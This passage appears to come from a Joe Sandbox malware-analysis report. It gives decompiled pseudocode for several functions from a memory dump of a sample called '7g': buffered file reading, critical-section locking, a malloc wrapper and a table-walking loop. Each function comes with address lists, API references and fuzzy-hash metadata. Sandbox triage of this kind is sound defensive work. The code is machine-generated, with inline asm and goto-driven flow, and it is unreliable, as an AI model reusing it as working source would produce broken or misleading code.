						if((_t89 & 0x0003ffff) != 0) {
							L25:
							__eflags = _t149 -  *(_t155 + 0x30);
							if(_t149 !=  *(_t155 + 0x30)) {
								L27:
								_t93 = E00B17450(_t155 + 0x18, _t140, _t149, _v8, 0,  &_v20);
								__eflags = _t93;
								if(_t93 == 0) {
									L42:
									_t85 = L00B1B183();
									goto L59;
								} else {
									 *(_t155 + 0x30) = _v20;
									 *((intOrPtr*)(_t155 + 0x34)) = _v16;
									L29:
									__eflags =  *((char*)(_t155 + 0x1e));
									 *(_t155 + 0x38) = _t149;
									 *(_t155 + 0x3c) = _v8;
									_t150 = 0x40000;
									if( *((char*)(_t155 + 0x1e)) == 0) {
										L33:
										__eflags =  *(_t155 + 0x40);
										if( *(_t155 + 0x40) != 0) {
											L35:
											_t117 = _t155 + 0x44;
											_t97 = E00B1786E(_t155 + 0x18,  *(_t155 + 0x40), _t150, _t117);
											__eflags = _t97;
											if(_t97 == 0) {
												goto L42;
											}
											_t98 =  *_t117;
											__eflags = _t98;
											if(_t98 == 0) {
												goto L10;
											}
											 *(_t155 + 0x30) =  *(_t155 + 0x30) + _t98;
											asm("adc dword [esi+0x34], 0x0");
											continue;
										}
										_t99 = L00B6B2E0(0x40000);
										__eflags = _t99;
										 *(_t155 + 0x40) = _t99;
										if(_t99 == 0) {
											_t85 = 0x8007000e;
											goto L59;
										}
										goto L35;
									}
									_t140 =  *(_t155 + 0x24);
									_t101 =  *((intOrPtr*)(_t155 + 0x20)) -  *(_t155 + 0x30);
									__eflags = _t101;
									asm("sbb edx, [esi+0x34]");
									_v24 =  *(_t155 + 0x24);
									if(_t101 != 0) {
										L32:
										_t150 = 0x40000;
										goto L33;
									}
									__eflags = _t101 - 0x40000;
									_t150 = _t101;
									if(_t101 < 0x40000) {
										goto L33;
									}
									goto L32;
								}
							}
							__eflags = _v8 -  *((intOrPtr*)(_t155 + 0x34));
							if(_v8 ==  *((intOrPtr*)(_t155 + 0x34))) {
								goto L29;
							}
							goto L27;
						}
						__eflags = _a8 & 0x0003ffff;
						if((_a8 & 0x0003ffff) != 0) {
							goto L25;
						}
						_t140 = 0;
						_t131 = _a12 +  *(_t155 + 0x28);
						asm("adc edx, [esi+0x2c]");
						__eflags = _t131 & 0x0003ffff;
						if((_t131 & 0x0003ffff) == 0) {
							L39:
							_t106 =  *(_t155 + 0x28);
							_t132 =  *((intOrPtr*)(_t155 + 0x2c));
							__eflags = _t106 -  *(_t155 + 0x30);
							if(_t106 !=  *(_t155 + 0x30)) {
								L41:
								_t107 = E00B17450(_t155 + 0x18,  &_v20, _t106, _t132, 0,  &_v20);
								__eflags = _t107;
								if(_t107 != 0) {
									_t108 = _v20;
									_t134 = _v16;
									 *(_t155 + 0x28) = _t108;
									 *(_t155 + 0x30) = _t108;
									 *((intOrPtr*)(_t155 + 0x2c)) = _t134;
									 *((intOrPtr*)(_t155 + 0x34)) = _t134;
									goto L49;
								}
								goto L42;
							}
							__eflags = _t132 -  *((intOrPtr*)(_t155 + 0x34));
							if(_t132 ==  *((intOrPtr*)(_t155 + 0x34))) {
								goto L49;
							}
							goto L41;
						}
						_t135 = _t131 & 0xfffc0000;
						__eflags = 0 -  *((intOrPtr*)(_t155 + 0x2c));
						if(__eflags > 0) {
							L38:
							_t136 = _t135 -  *(_t155 + 0x28);
							__eflags = _t136;
							_a12 = _t136;
							goto L39;
						}
						if(__eflags < 0) {
							goto L25;
						}
						__eflags = _t135 -  *(_t155 + 0x28);
						if(_t135 >  *(_t155 + 0x28)) {
							goto L38;
						}
						goto L25;
					}
				}
				_t152 =  *((intOrPtr*)(_t155 + 0x2c));
				_t139 =  *(_t155 + 0x24);
				_t145 =  *(_t155 + 0x28);
				_t113 =  *((intOrPtr*)(_t155 + 0x20));
				_t163 = _t152 - _t139;
				if(_t163 < 0 || _t163 <= 0 && _t145 < _t113) {
					_t114 = _t113 - _t145;
					asm("sbb ecx, edi");
					_t140 = 0;
					__eflags = 0 - _t139;
					if(__eflags < 0) {
						goto L15;
					}
					if(__eflags > 0) {
						L14:
						_a12 = _t114;
						goto L15;
					}
					__eflags = _a12 - _t114;
					if(_a12 <= _t114) {
						goto L15;
					}
					goto L14;
				} else {
					if(_t145 != _t113 || _t152 != _t139) {
						goto L56;
					} else {
						goto L10;
					}
				}
			}










































                                                                                                                    0x00b1af05
                                                                                                                    0x00b1af0a
                                                                                                                    0x00b1af0c
                                                                                                                    0x00b1af0c
                                                                                                                    0x00b1af16
                                                                                                                    0x00b1af51
                                                                                                                    0x00b1af51
                                                                                                                    0x00b1b17c
                                                                                                                    0x00b1b180
                                                                                                                    0x00b1b180
                                                                                                                    0x00b1af18
                                                                                                                    0x00b1af1f
                                                                                                                    0x00b1b10d
                                                                                                                    0x00b1b11a
                                                                                                                    0x00b1b11f
                                                                                                                    0x00b1b122
                                                                                                                    0x00b1b125
                                                                                                                    0x00b1b127
                                                                                                                    0x00b1b129
                                                                                                                    0x00b1b129
                                                                                                                    0x00b1b12d
                                                                                                                    0x00b1b130
                                                                                                                    0x00b1b133
                                                                                                                    0x00b1b136
                                                                                                                    0x00b1b139
                                                                                                                    0x00b1b13b
                                                                                                                    0x00000000
                                                                                                                    0x00b1b141
                                                                                                                    0x00b1b141
                                                                                                                    0x00b1b147
                                                                                                                    0x00b1b14d
                                                                                                                    0x00b1b14f
                                                                                                                    0x00b1b165
                                                                                                                    0x00b1b167
                                                                                                                    0x00b1b170
                                                                                                                    0x00b1b177
                                                                                                                    0x00b1b177
                                                                                                                    0x00b1b177
                                                                                                                    0x00000000
                                                                                                                    0x00b1b170
                                                                                                                    0x00b1b169
                                                                                                                    0x00b1b169
                                                                                                                    0x00000000
                                                                                                                    0x00b1b169
                                                                                                                    0x00b1b15a
                                                                                                                    0x00000000
                                                                                                                    0x00b1b15a
                                                                                                                    0x00b1b13b
                                                                                                                    0x00b1af29
                                                                                                                    0x00b1af6c
                                                                                                                    0x00b1af6c
                                                                                                                    0x00b1af6f
                                                                                                                    0x00b1af6f
                                                                                                                    0x00b1af72
                                                                                                                    0x00b1af77
                                                                                                                    0x00b1af7a
                                                                                                                    0x00b1af80
                                                                                                                    0x00b1af83
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b1af85
                                                                                                                    0x00b1af88
                                                                                                                    0x00b1af8a
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b1af8c
                                                                                                                    0x00b1af8f
                                                                                                                    0x00b1af91
                                                                                                                    0x00b1b0b5
                                                                                                                    0x00b1b0b7
                                                                                                                    0x00b1b0bc
                                                                                                                    0x00b1b0be
                                                                                                                    0x00b1b0c6
                                                                                                                    0x00b1b0c8
                                                                                                                    0x00b1b0cb
                                                                                                                    0x00b1b0cd
                                                                                                                    0x00b1b0cd
                                                                                                                    0x00b1b0da
                                                                                                                    0x00b1b0df
                                                                                                                    0x00b1b0e5
                                                                                                                    0x00b1b0e8
                                                                                                                    0x00b1b0ec
                                                                                                                    0x00b1b0ee
                                                                                                                    0x00b1b0f4
                                                                                                                    0x00b1b0f4
                                                                                                                    0x00b1b0ee
                                                                                                                    0x00000000
                                                                                                                    0x00b1b0be
                                                                                                                    0x00b1af97
                                                                                                                    0x00b1afa0
                                                                                                                    0x00b1afa2
                                                                                                                    0x00b1afdc
                                                                                                                    0x00b1afdc
                                                                                                                    0x00b1afdf
                                                                                                                    0x00b1afe9
                                                                                                                    0x00b1aff6
                                                                                                                    0x00b1affb
                                                                                                                    0x00b1affd
                                                                                                                    0x00b1b0a8
                                                                                                                    0x00b1b0a8
                                                                                                                    0x00000000
                                                                                                                    0x00b1b003
                                                                                                                    0x00b1b006
                                                                                                                    0x00b1b00c
                                                                                                                    0x00b1b00f
                                                                                                                    0x00b1b012
                                                                                                                    0x00b1b01b
                                                                                                                    0x00b1b01e
                                                                                                                    0x00b1b021
                                                                                                                    0x00b1b023
                                                                                                                    0x00b1b03e
                                                                                                                    0x00b1b03e
                                                                                                                    0x00b1b042
                                                                                                                    0x00b1b054
                                                                                                                    0x00b1b054
                                                                                                                    0x00b1b05f
                                                                                                                    0x00b1b064
                                                                                                                    0x00b1b066
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b1b068
                                                                                                                    0x00b1b06a
                                                                                                                    0x00b1b06c
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b1b072
                                                                                                                    0x00b1b075
                                                                                                                    0x00000000
                                                                                                                    0x00b1b075
                                                                                                                    0x00b1b044
                                                                                                                    0x00b1b049
                                                                                                                    0x00b1b04b
                                                                                                                    0x00b1b04e
                                                                                                                    0x00b1b15e
                                                                                                                    0x00000000
                                                                                                                    0x00b1b15e
                                                                                                                    0x00000000
                                                                                                                    0x00b1b04e
                                                                                                                    0x00b1b028
                                                                                                                    0x00b1b02b
                                                                                                                    0x00b1b02b
                                                                                                                    0x00b1b02e
                                                                                                                    0x00b1b031
                                                                                                                    0x00b1b034
                                                                                                                    0x00b1b03c
                                                                                                                    0x00b1b03c
                                                                                                                    0x00000000
                                                                                                                    0x00b1b03c
                                                                                                                    0x00b1b036
                                                                                                                    0x00b1b038
                                                                                                                    0x00b1b03a
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b1b03a
                                                                                                                    0x00b1affd
                                                                                                                    0x00b1afe4
                                                                                                                    0x00b1afe7
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b1afe7
                                                                                                                    0x00b1afa4
                                                                                                                    0x00b1afa7
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b1afac
                                                                                                                    0x00b1afae
                                                                                                                    0x00b1afb1
                                                                                                                    0x00b1afba
                                                                                                                    0x00b1afbc
                                                                                                                    0x00b1b084
                                                                                                                    0x00b1b084
                                                                                                                    0x00b1b087
                                                                                                                    0x00b1b08a
                                                                                                                    0x00b1b08d
                                                                                                                    0x00b1b094
                                                                                                                    0x00b1b09f
                                                                                                                    0x00b1b0a4
                                                                                                                    0x00b1b0a6
                                                                                                                    0x00b1b0fb
                                                                                                                    0x00b1b0fe
                                                                                                                    0x00b1b101
                                                                                                                    0x00b1b104
                                                                                                                    0x00b1b107
                                                                                                                    0x00b1b10a
                                                                                                                    0x00000000
                                                                                                                    0x00b1b10a
                                                                                                                    0x00000000
                                                                                                                    0x00b1b0a6
                                                                                                                    0x00b1b08f
                                                                                                                    0x00b1b092
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b1b092
                                                                                                                    0x00b1afc2
                                                                                                                    0x00b1afc8
                                                                                                                    0x00b1afcb
                                                                                                                    0x00b1b07e
                                                                                                                    0x00b1b07e
                                                                                                                    0x00b1b07e
                                                                                                                    0x00b1b081
                                                                                                                    0x00000000
                                                                                                                    0x00b1b081
                                                                                                                    0x00b1afd1
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b1afd3
                                                                                                                    0x00b1afd6
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b1afd6
                                                                                                                    0x00b1af6f
                                                                                                                    0x00b1af2b
                                                                                                                    0x00b1af2e
                                                                                                                    0x00b1af31
                                                                                                                    0x00b1af34
                                                                                                                    0x00b1af37
                                                                                                                    0x00b1af39
                                                                                                                    0x00b1af58
                                                                                                                    0x00b1af5a
                                                                                                                    0x00b1af5c
                                                                                                                    0x00b1af5e
                                                                                                                    0x00b1af60
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b1af62
                                                                                                                    0x00b1af69
                                                                                                                    0x00b1af69
                                                                                                                    0x00000000
                                                                                                                    0x00b1af69
                                                                                                                    0x00b1af64
                                                                                                                    0x00b1af67
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b1af41
                                                                                                                    0x00b1af43
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b1af43

                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.683592501.0000000000B11000.00000020.00000001.01000000.00000008.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                    • Associated: 0000000D.00000002.683584765.0000000000B10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683731985.0000000000B89000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683757045.0000000000B9A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683775176.0000000000BA2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_b10000_7g.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorLastmemcpy
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2523627151-0
                                                                                                                    • Opcode ID: 02ffa19b54089c4d93b7610af222066d5cb9cc94fdf2fc2552d6c31641c3bd10
                                                                                                                    • Instruction ID: b3ea0fb5adefff607153b347092ccfe0d51d2df442e4f8c08fe2df85e400c844
                                                                                                                    • Opcode Fuzzy Hash: 02ffa19b54089c4d93b7610af222066d5cb9cc94fdf2fc2552d6c31641c3bd10
                                                                                                                    • Instruction Fuzzy Hash: 198156716007059FCB24CE25C990AABB7F2FF48310F954AADE88AD7A50D730F986CB55
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00B77C10 Relevance: 2.6, APIs: 2, Instructions: 66COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 48%
                                                                                                                    			E00B77C10(void* __ecx, intOrPtr* __edx, intOrPtr _a4, void* _a8, intOrPtr _a12, void* _a16, intOrPtr _a20, intOrPtr _a24) {
				intOrPtr _t31;
				void* _t37;
				intOrPtr* _t38;
				intOrPtr* _t45;
				struct _CRITICAL_SECTION* _t54;
				void* _t55;
				void* _t61;

				_t55 = __ecx;
				_t38 = __edx;
				_t54 = __ecx + 0xb0;
				EnterCriticalSection(_t54);
				 *((intOrPtr*)(_t55 + 0xa0)) =  *((intOrPtr*)(_t55 + 0xa0)) + _a4;
				asm("adc edx, ecx");
				 *((intOrPtr*)(_t55 + 0xa8)) =  *((intOrPtr*)(_t55 + 0xa8)) + _a12;
				asm("adc ecx, eax");
				if( *((intOrPtr*)(_t55 + 0x9c)) == 0) {
					_t45 =  *((intOrPtr*)(_t55 + 0x98));
					if(_t45 != 0) {
						_t37 =  *_t45( *((intOrPtr*)(_t55 + 0xa0)),  *((intOrPtr*)(_t55 + 0xa4)),  *((intOrPtr*)(_t55 + 0xa8)),  *((intOrPtr*)(_t55 + 0xac))); // executed
						if(_t37 != 0) {
							 *((intOrPtr*)(_t55 + 0x9c)) = 0xa;
						}
					}
				}
				if( *((intOrPtr*)(_t55 + 0x88)) == 0) {
					L9:
					_t31 = 0;
					L10:
					 *_t38 = _t31;
					LeaveCriticalSection(_t54);
					return  *((intOrPtr*)(_t55 + 0x9c));
				}
				_t61 = _a24 -  *((intOrPtr*)(_t55 + 0x94));
				if(_t61 < 0 || _t61 <= 0 && _a20 <=  *((intOrPtr*)(_t55 + 0x90))) {
					goto L9;
				} else {
					_t31 = 1;
					goto L10;
				}
			}










                                                                                                                    0x00b77c12
                                                                                                                    0x00b77c15
                                                                                                                    0x00b77c17
                                                                                                                    0x00b77c1e
                                                                                                                    0x00b77c38
                                                                                                                    0x00b77c44
                                                                                                                    0x00b77c58
                                                                                                                    0x00b77c64
                                                                                                                    0x00b77c74
                                                                                                                    0x00b77c76
                                                                                                                    0x00b77c7e
                                                                                                                    0x00b77c9c
                                                                                                                    0x00b77ca0
                                                                                                                    0x00b77ca2
                                                                                                                    0x00b77ca2
                                                                                                                    0x00b77ca0
                                                                                                                    0x00b77c7e
                                                                                                                    0x00b77cb4
                                                                                                                    0x00b77cdb
                                                                                                                    0x00b77cdb
                                                                                                                    0x00b77cdd
                                                                                                                    0x00b77cdd
                                                                                                                    0x00b77ce6
                                                                                                                    0x00b77cf1
                                                                                                                    0x00b77cf1
                                                                                                                    0x00b77cc0
                                                                                                                    0x00b77cc2
                                                                                                                    0x00000000
                                                                                                                    0x00b77cd4
                                                                                                                    0x00b77cd4
                                                                                                                    0x00000000
                                                                                                                    0x00b77cd4

                                                                                                                    APIs
                                                                                                                    • EnterCriticalSection.KERNEL32(?,00000000,?,?,00B77298,00000000,00000000,00000000,00000000,?,?,?,?), ref: 00B77C1E
                                                                                                                    • LeaveCriticalSection.KERNEL32(?,?,00B77298,00000000,00000000,00000000,00000000,?,?,?,?), ref: 00B77CE6
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.683592501.0000000000B11000.00000020.00000001.01000000.00000008.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                    • Associated: 0000000D.00000002.683584765.0000000000B10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683731985.0000000000B89000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683757045.0000000000B9A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683775176.0000000000BA2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_b10000_7g.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CriticalSection$EnterLeave
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3168844106-0
                                                                                                                    • Opcode ID: 956ff7ad0e49035e1bc22b2ea1b16fd10d494b8a1b59dab680730e64281b813d
                                                                                                                    • Instruction ID: 23747e455f92267992c68613e0a51f581af2e92a6f3be797001f07fada6ed72f
                                                                                                                    • Opcode Fuzzy Hash: 956ff7ad0e49035e1bc22b2ea1b16fd10d494b8a1b59dab680730e64281b813d
                                                                                                                    • Instruction Fuzzy Hash: F921B475704B009FD764CE39C880BA7B3E6EF89701F14885DE5AEC7300DB30A8059B62
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00B446B5 Relevance: 2.5, APIs: 2, Instructions: 25COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 100%
                                                                                                                    			E00B446B5(intOrPtr _a4, intOrPtr* _a8) {
				intOrPtr _t8;
				void* _t9;
				intOrPtr* _t12;

				EnterCriticalSection(0xb9a878);
				_t8 = _a4;
				if( *((intOrPtr*)(_t8 + 0xbc)) != 0) {
					_t12 = _a8;
					if(_t12 != 0) {
						 *((intOrPtr*)(_t8 + 0x18)) =  *_t12;
						 *((intOrPtr*)(_t8 + 0x1c)) =  *((intOrPtr*)(_t12 + 4));
					}
					E00B4B752(_t8 + 0x18); // executed
				}
				_t9 = L00B4574E();
				LeaveCriticalSection(0xb9a878);
				return _t9;
			}






                                                                                                                    0x00b446bd
                                                                                                                    0x00b446c3
                                                                                                                    0x00b446ce
                                                                                                                    0x00b446d0
                                                                                                                    0x00b446d6
                                                                                                                    0x00b446da
                                                                                                                    0x00b446e0
                                                                                                                    0x00b446e0
                                                                                                                    0x00b446e6
                                                                                                                    0x00b446e6
                                                                                                                    0x00b446eb
                                                                                                                    0x00b446f3
                                                                                                                    0x00b446fd

                                                                                                                    APIs
                                                                                                                    • EnterCriticalSection.KERNEL32(00B9A878), ref: 00B446BD
                                                                                                                    • LeaveCriticalSection.KERNEL32(00B9A878), ref: 00B446F3
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.683592501.0000000000B11000.00000020.00000001.01000000.00000008.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                    • Associated: 0000000D.00000002.683584765.0000000000B10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683731985.0000000000B89000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683757045.0000000000B9A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683775176.0000000000BA2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_b10000_7g.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CriticalSection$EnterLeave
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3168844106-0
                                                                                                                    • Opcode ID: 625df3d5ef4a5b4ea92a8628ffc189927164b76aaf83d1b9e7b2eab7e8eb8319
                                                                                                                    • Instruction ID: 123cf57d60000c545d521b26d62ab63d1144507e98f24a44064deba1b11d3a64
                                                                                                                    • Opcode Fuzzy Hash: 625df3d5ef4a5b4ea92a8628ffc189927164b76aaf83d1b9e7b2eab7e8eb8319
                                                                                                                    • Instruction Fuzzy Hash: 9AF01C35600610DFC708DF25D988EA677E5EF95321B1684BDE40687271CB30DD46DBA1
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00B4466F Relevance: 2.5, APIs: 2, Instructions: 22COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 100%
                                                                                                                    			E00B4466F(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _t8;
				void* _t9;

				EnterCriticalSection(0xb9a878);
				_t8 = _a4;
				if( *((intOrPtr*)(_t8 + 0xbc)) != 0) {
					 *((intOrPtr*)(_t8 + 0x20)) = _a8;
					 *((intOrPtr*)(_t8 + 0x24)) = _a12;
					E00B4B752(_t8 + 0x18); // executed
				}
				_t9 = L00B4574E();
				LeaveCriticalSection(0xb9a878);
				return _t9;
			}





                                                                                                                    0x00b44677
                                                                                                                    0x00b4467d
                                                                                                                    0x00b44688
                                                                                                                    0x00b4468e
                                                                                                                    0x00b44695
                                                                                                                    0x00b4469b
                                                                                                                    0x00b4469b
                                                                                                                    0x00b446a0
                                                                                                                    0x00b446a8
                                                                                                                    0x00b446b2

                                                                                                                    APIs
                                                                                                                    • EnterCriticalSection.KERNEL32(00B9A878), ref: 00B44677
                                                                                                                    • LeaveCriticalSection.KERNEL32(00B9A878), ref: 00B446A8
                                                                                                                      • Part of subcall function 00B4B752: GetTickCount.KERNEL32 ref: 00B4B767
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.683592501.0000000000B11000.00000020.00000001.01000000.00000008.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                    • Associated: 0000000D.00000002.683584765.0000000000B10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683731985.0000000000B89000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683757045.0000000000B9A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683775176.0000000000BA2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_b10000_7g.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CriticalSection$CountEnterLeaveTick
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1056156058-0
                                                                                                                    • Opcode ID: 53c1e0120fb60463dc411fdaab2ac546821be3c7c26ab9ec03b33a724f1d28d8
                                                                                                                    • Instruction ID: d28d5c1c13a24868d3513ee90d76616bdd556bb2d1fc19a3c841b13da955eb62
                                                                                                                    • Opcode Fuzzy Hash: 53c1e0120fb60463dc411fdaab2ac546821be3c7c26ab9ec03b33a724f1d28d8
                                                                                                                    • Instruction Fuzzy Hash: E0E03275204220DBC7049F28E948EAA77E5ABC9321F0605BEE80683361CB30DC49CBA2
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00B11E55 Relevance: 2.5, APIs: 2, Instructions: 18COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 75%
                                                                                                                    			E00B11E55(int _a4, char _a7) {
				void* _t7;
				char* _t9;

				if(_a4 == 0) {
					_a4 = 1;
				}
				_t7 = malloc(_a4); // executed
				if(_t7 == 0) {
					_push(0xb90098);
					_t9 =  &_a7;
					_push(_t9);
					L00B7F160();
					return _t9;
				}
				return _t7;
			}





                                                                                                                    0x00b11e5c
                                                                                                                    0x00b11e5e
                                                                                                                    0x00b11e5e
                                                                                                                    0x00b11e68
                                                                                                                    0x00b11e71
                                                                                                                    0x00b11e76
                                                                                                                    0x00b11e7e
                                                                                                                    0x00b11e81
                                                                                                                    0x00b11e82
                                                                                                                    0x00000000
                                                                                                                    0x00b11e82
                                                                                                                    0x00b11e88

                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.683592501.0000000000B11000.00000020.00000001.01000000.00000008.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                    • Associated: 0000000D.00000002.683584765.0000000000B10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683731985.0000000000B89000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683757045.0000000000B9A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683775176.0000000000BA2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_b10000_7g.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ExceptionThrowmalloc
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2436765578-0
                                                                                                                    • Opcode ID: 71a9f8c7d872508632418da9224820cabe13794001c4bd4bb863fe539f498758
                                                                                                                    • Instruction ID: 4a82b3594634779c1727c728013aac9aea2fd77cf6b39837223fa641e01b0705
                                                                                                                    • Opcode Fuzzy Hash: 71a9f8c7d872508632418da9224820cabe13794001c4bd4bb863fe539f498758
                                                                                                                    • Instruction Fuzzy Hash: F5E0EC3210424CAADF106FA4D8497E93BA89B11754F90D4A5F91C5E551DA71C7D4C750
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00B56F85 Relevance: 2.2, APIs: 1, Instructions: 653COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 78%
                                                                                                                    			E00B56F85() {
				signed int _t359;
				signed int _t369;
				signed int _t370;
				signed int _t374;
				signed int _t377;
				signed int _t381;
				signed int _t383;
				signed int _t387;
				signed int _t388;
				signed int _t389;
				signed int _t391;
				signed int _t392;
				signed int _t393;
				signed int _t401;
				signed int _t402;
				signed int _t403;
				signed int _t405;
				signed int _t406;
				signed int _t415;
				signed int _t416;
				signed int _t417;
				signed int _t419;
				signed int _t420;
				signed int _t427;
				signed int _t428;
				signed int _t430;
				signed int _t431;
				signed int _t436;
				signed int _t437;
				signed int _t439;
				signed int _t440;
				intOrPtr _t445;
				signed int _t447;
				signed int _t448;
				signed int _t455;
				signed int _t456;
				signed int _t458;
				signed int _t459;
				signed int _t464;
				signed int _t465;
				signed int _t467;
				signed int _t485;
				signed int _t486;
				signed int _t487;
				signed int _t488;
				signed int _t490;
				signed int _t492;
				intOrPtr _t493;
				signed int _t496;
				signed int _t501;
				signed int _t502;
				signed int _t517;
				intOrPtr _t560;
				signed int _t566;
				signed int _t579;
				signed int _t582;
				signed int _t584;
				signed int _t586;
				signed int _t591;
				signed int _t592;
				signed int _t593;
				signed int _t594;
				signed int _t596;
				signed int _t602;
				void* _t604;
				void* _t606;

				L00B7F140(0xb874fd, _t604);
				_t591 =  *(_t604 + 0x18);
				_t485 = _t591;
				 *((intOrPtr*)(_t604 - 0x10)) = _t606 - 0xb0;
				 *(_t604 - 4) = 0;
				 *(_t604 - 0x14) = _t485;
				if(_t591 != 0) {
					 *((intOrPtr*)( *_t591 + 4))(_t591);
				}
				 *((intOrPtr*)(_t604 - 0x40)) = 0;
				 *(_t604 - 0x3c) = 0;
				_t602 =  *(_t604 + 8);
				 *(_t604 + 0x1b) =  *((intOrPtr*)(_t604 + 0x10)) == 0xffffffff;
				 *(_t604 - 4) = 1;
				if( *(_t604 + 0x1b) != 0) {
					 *((intOrPtr*)(_t604 + 0x10)) =  *((intOrPtr*)(_t602 + 0x10c));
				}
				_t350 = 0;
				if( *((intOrPtr*)(_t604 + 0x10)) != 0) {
					_t592 = _t591 | 0xffffffff;
					__eflags = 0;
					while(1) {
						__eflags = _t350 -  *((intOrPtr*)(_t604 + 0x10));
						 *(_t604 - 0x34) = _t350;
						if(_t350 >=  *((intOrPtr*)(_t604 + 0x10))) {
							break;
						}
						__eflags =  *(_t604 + 0x1b);
						if( *(_t604 + 0x1b) == 0) {
							_t350 =  *( *((intOrPtr*)(_t604 + 0xc)) + _t350 * 4);
						}
						_t579 =  *( *((intOrPtr*)(_t602 + 0x1e4)) + _t350 * 4);
						__eflags = _t579 - 0xffffffff;
						if(_t579 == 0xffffffff) {
							L19:
							_t350 =  *(_t604 - 0x34) + 1;
							continue;
						} else {
							__eflags = _t579 - _t592;
							if(_t579 != _t592) {
								L14:
								_t586 =  *( *((intOrPtr*)(_t602 + 0x1e0)) + _t579 * 4);
								L15:
								 *(_t604 + 8) = _t586;
								while(1) {
									__eflags =  *(_t604 + 8) - _t350;
									if( *(_t604 + 8) > _t350) {
										break;
									}
